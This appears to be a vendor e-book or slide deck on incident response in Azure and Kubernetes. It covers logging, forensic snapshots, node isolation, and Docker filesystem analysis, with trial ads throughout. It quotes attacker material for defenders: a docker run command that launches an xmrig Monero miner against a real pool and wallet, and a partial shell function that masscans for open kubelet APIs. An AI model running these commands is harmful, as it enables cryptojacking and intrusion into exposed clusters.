● Identify highly privileged users by using the Azure Portal and Azure Graph
● Identify which applications AD provides authentication for
● Identify and deactivate potentially compromised user accounts
● Identify and disable legacy authentication methods
Will Oram has made a great guide on how to specifically respond to incidents involving Azure Active Directory.
https://github.com/WillOram/AzureAD-incident-response
180. Logging in Azure
Azure has a number of different logs, including:
● Activity Logs: Management events against your subscription e.g., creating a Virtual Machine. Retrieve from the Azure Monitor>Activity
Log Service.
● Resource Logs: Data plane events, for example, retrieving a key from a store. Enabled from Diagnostic settings.
● Azure Active Directory Logs: User events and other things generally operated by AD. Enabled from AD > Diagnostic Settings.
● Windows Azure Diagnostics: Logs collected from inside the host. These can be forwarded to your SIEM.
● Application Logs: General application health and performance.
● Storage Analytics Logs: Specific to the storage service.
● Network Security Group Flow Logs: Typical minimal flow logs
● Security Center: Alarms from potentially malicious events
See also:
https://www.datadoghq.com/blog/monitoring-azure-platform-logs/
https://ponderthebits.com/wp-content/uploads/2020/02/Logging-in-the-Cloud-From-Zero-to-Incident-Response-Hero-Public.pdf
181. Open Source Tools
The community has created a number of tools that may be of use when
responding to incidents in Azure:
● Azure AD Incident Response PowerShell Module
● Sparrow (Identifies compromised accounts in AD)
● Mandiant Azure AD Investigator
● Azure Hound (Collects data from Azure)
● Hawk (Retrieves data for 365 Investigations)
● CrowdStrike Reporting Tool for Azure (Identifies possible issues)
● Cloud Forensic Utils (Retrieves forensic data from Virtual Machines)
182. Native Azure Tools
Microsoft provides advice on how to use the following platforms to investigate security incidents:
● Azure Security Center
https://azure.microsoft.com/en-gb/blog/how-azure-security-center-helps-analyze-attacks-using-investigation-and-log-search/
● Azure Sentinel
https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Training/Azure-Sentinel-Training-Lab/Modules/Module-4-Incid
ent-Management.md
● Defender
https://learn.microsoft.com/en-us/microsoft-365/security/defender/incident-response-overview?view=o365-worldwide
183. Cado Response
Free 14-day trial
Receive unlimited access to
the Cado Response Platform
for 14 days.
www.cadosecurity.com/free-investigation/
185. Virtual Machines
az snapshot create --name
--resource-group
[--accelerated-network {false, true}]
[--architecture {Arm64, x64}]
[--copy-start {false, true}]
[--disk-access]
[--disk-encryption-set]
[--edge-zone]
[--encryption-type {EncryptionAtRestWithCustomerKey,
EncryptionAtRestWithPlatformAndCustomerKeys, EncryptionAtRestWithPlatformKey}]
[--for-upload {false, true}]
[--hyper-v-generation {V1, V2}]
Azure Virtual Machines (VMs) are a cloud computing service from Microsoft that enables users to create, configure,
and manage virtual machines in the cloud. VMs can be created from pre-configured images or from scratch and can
be configured to run a variety of operating systems and applications. Azure VMs are available in a variety of sizes
and can be scaled up or down to meet changing computing needs.
Azure provides the functionality to export the disk images of Virtual Machines in VHD format for forensic analysis.
This can be done by selecting the disk, then selecting Create Snapshot. This can also be done on the command
line using the az snapshot create command:
187. Creating a Snapshot for Forensics Manually
https://learn.microsoft.com/en-us/azure/virtual-machines/disks-incremental-snapshots?tabs=azure-cli
Also see SDK @ https://github.com/google/cloud-forensics-utils
192. Azure Kubernetes Service (AKS) is a managed Kubernetes service that lets you quickly deploy and manage
containerized applications in the cloud.
AKS reduces the complexity and operational overhead of managing Kubernetes by offloading much of that responsibility
to the Azure cloud.
As a hosted Kubernetes service, AKS is quickly becoming a popular choice for developers and enterprises that want to
deploy applications in containers.
AKS
193. Monitoring AKS with Sentinel
● Azure Security Center (ASC) AKS threat protection
● Azure Diagnostics logs
● Third party tool alert integration
https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/monitoring-azure-kubernetes-service-aks-with-microsoft-sentinel/ba-p/1583204
195. Cado Response can collect the full contents of containers running on AKS by retrieving a copy of the container disk or
files over the Kubernetes Control plane using Cado Host:
Acquiring AKS
196. Cado Response
Free 14-day trial
Receive unlimited access to
the Cado Response Platform
for 14 days.
www.cadosecurity.com/free-investigation/
217. https://cloud.google.com/kubernetes-engine/docs/how-to/security-mitigations
Snapshot the VM's disk
gcloud compute instances describe NODE_NAME --zone COMPUTE_ZONE --format="flattened([disks])"
Look for the lines that contain disks[NUMBER].source. E.g.
gcloud compute disks snapshot DISK_NAME
disks[0].source:
https://www.googleapis.com/compute/v1/projects/PROJECT_NAME/zones/COMPUTE_ZONE/disks/DISK_NAME
gcloud compute disks snapshot DISK_NAME
Create the snapshot with:
218. https://cloud.google.com/kubernetes-engine/docs/how-to/security-mitigations
Inspect the VM while the workload continues to run
By cordoning, draining, and limiting network access to the VM hosting a compromised container, you can partially isolate the
compromised container from the rest of your cluster.
Limiting access to the VM reduces risk but does not prevent an attacker from moving laterally in your environment if they
take advantage of a critical vulnerability.
Abandoning the VM prevents the node from being marked unhealthy and auto-repaired (re-created) before your investigation
is complete.
kubectl cordon NODE_NAME
kubectl label pods POD_NAME quarantine=true
kubectl drain NODE_NAME --pod-selector='!quarantine'
# Restrict network access
gcloud compute instance-groups managed abandon-instances INSTANCE_GROUP_NAME
--instances=NODE_NAME
235. Building a Container Forensics Incident Response Plan
When building a container forensics incident response plan,
there are three main focus areas to consider:
Preventative
Measures
Preservation &
Investigation
Planning &
Testing
236. Preventative Measures
Preventative measures can help reduce the risk of container compromise:
● Restrict access to kubectl and the Docker/Kubernetes APIs
● Ensure Kubernetes and Docker and the containers running within are
kept patched and up to date
● Create an allow-list for inbound and outbound network traffic
237. Preservation & Investigation
In the event an incident occurs, it is critical to preserve the evidence that’s required to allow for an
in-depth investigation:
● Never destroy the node when compromised! This will make it impossible to identify root cause
● Determine which evidence you plan to capture and ensure its enough visibility to determine root
cause and impact -- remember, the more data sources you can analyze, the better your
investigation will be
● Have a plan for how to capture the data you need and test your ability to capture it- given the
dynamic and ephemeral nature of containers, automation is key
● Know how to snapshot the host that contains the containerized disks
238. Planning & Testing
As always, planning and testing is crucial to ensuring alignment and overall success in the event a
major incident occurs:
● Assign an incident response lead to serve as the primary decision maker during a major incident
● Determine which parts of the business you need to communicate with in the event a breach
occurs
● Understand what legal and/or customer obligations you have following a major incident
● Decide what’s considered a high-severity incident, and implement escalation processes and
procedures
● Conduct red team exercises and assessments to continuously improve your security defenses
and be best prepared for a real-world data breach
239. How Attackers are Compromising Containerized Systems
Below is an example command attackers use to start a malicious Docker container on a compromised host using the
“docker run” command:
docker run --name sosmsen2 --restart unless-stopped --read-only -m 50M bitnn/alpine-xmrig -o
stratum+tcp://xmr.crypto-pool.fr:3333 -u
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p
x -k --donate-level=1
We often also see attackers spin up the official xmrig docker containers too.
In general, if you see a container running with “xmrig” in the name, it usually means an
investigation is required.
#1 Running Local Docker Commands
240. Below is an example shell script attackers use to move laterally on a compromised network by finding open
Kubernetes APIs on the default port 10250 and 10255:
kube_pwn(){
LRANGE=$1
rndstr=$(head /dev/urandom | tr -dc a-z | head -c 6 ; echo '')
eval "$rndstr"="'$(masscan --open -p10250 $LRANGE --rate=250000 | awk '{print $6}')'";
for ipaddr in ${!rndstr} ; do
if [ -f $TEMPFILE ]; then rm -f $TEMPFILE; fi
timeout -s SIGKILL $T1OUT curl -sLk https://$theip:10250/runningpods/ | jq -r '.items[] | .metadata.namespace + " " +
.metadata.name + " " + .spec.containers[].name' >> $TEMPFILE
.....
#2 Exploiting the Kubernetes API
Early versions of Kubernetes provided limited default authentication options. Fortunately, this is no
longer the case.
However, it’s still important to ensure that access to the Kubernetes API is
restricted with a firewall at the network level and credentials are set on the host
itself.
241. Investigating Compromises in Containerized Environments
Let’s say you’ve received an alert indicating the presence of monero mining malware on a Kubernetes host.
First and foremost, it’s important to understand whether the compromise is in the host or
in the container/pod.
Below we’ll investigate a compromised Docker container using the overlay2 file system. The screenshots below
are captured from the Cado Response platform, but the filenames and forensic principles will map to other
toolsets:
243. Many coin miners exploit open Docker and Kubernetes APIs. The JSON format logs under /var/lib/docker/containers
may record access and execution. In the example log below, we can see an xmrig container spinning up:
244. A Brief Introduction to the Docker File System
Docker supports a number of storage drivers:
● overlay2 is the one you will most commonly see. You will be able to identify it by the name
"overlay2" in the folder names
● aufs was the preferred driver in Docker 18.06 (February 2019 release) and older
● fuse-overlayfs is used for Rootless Docker on older hosts
● devicemapper is used for older versions of CentOS and RedHat
● btrfs and zfs are used for enterprise deployments with more complicated snapshotting
requirements
● vfs is used in testing
245. overlay2
Overlay2 is the file system you are most likely to see.
It’s also versioned, which helps preserve evidence of attacks.
Separate containers are kept in their own folders:
246. AWS EKS Logs Stored in AWS
It's important to also analyze AWS logs that are generated for EKS systems.
These contain metadata around starting and stopping containers.
Below you can see a view of AWS logs collected in Cado Response: